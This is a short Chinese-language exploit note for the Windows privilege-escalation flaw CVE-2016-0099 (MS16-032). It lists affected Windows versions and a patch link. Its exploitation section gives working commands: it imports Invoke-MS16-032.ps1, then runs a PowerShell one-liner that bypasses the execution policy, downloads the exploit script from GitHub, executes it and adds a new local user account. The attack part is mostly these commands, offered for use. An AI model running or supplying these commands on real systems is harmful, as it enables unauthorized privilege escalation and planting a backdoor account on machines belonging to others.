CVE-2016-0099
描述
此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行
影响版本
| Product | Version | Update | Edition | Tested |
|---|---|---|---|---|
| Windows 10 | - | |||
| Windows 10 | 1511 | |||
| Windows 7 | - | SP1 | :heavy_check_mark: | |
| Windows 8.1 | - | |||
| Windows Rt 8.1 | - | |||
| Windows Server 2008 | SP2 | :heavy_check_mark: | ||
| Windows Server 2008 | R2 | SP1 | :heavy_check_mark: | |
| Windows Server 2012 | - | |||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0099利用方式
目标系统需要有2个以上的CPU核心
PS脚本测试,在Windows server 2008 R2 sp1 x64执行下面命令
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032还能远程添加账户
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"GIF图如下
利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 sp1 x64版本的
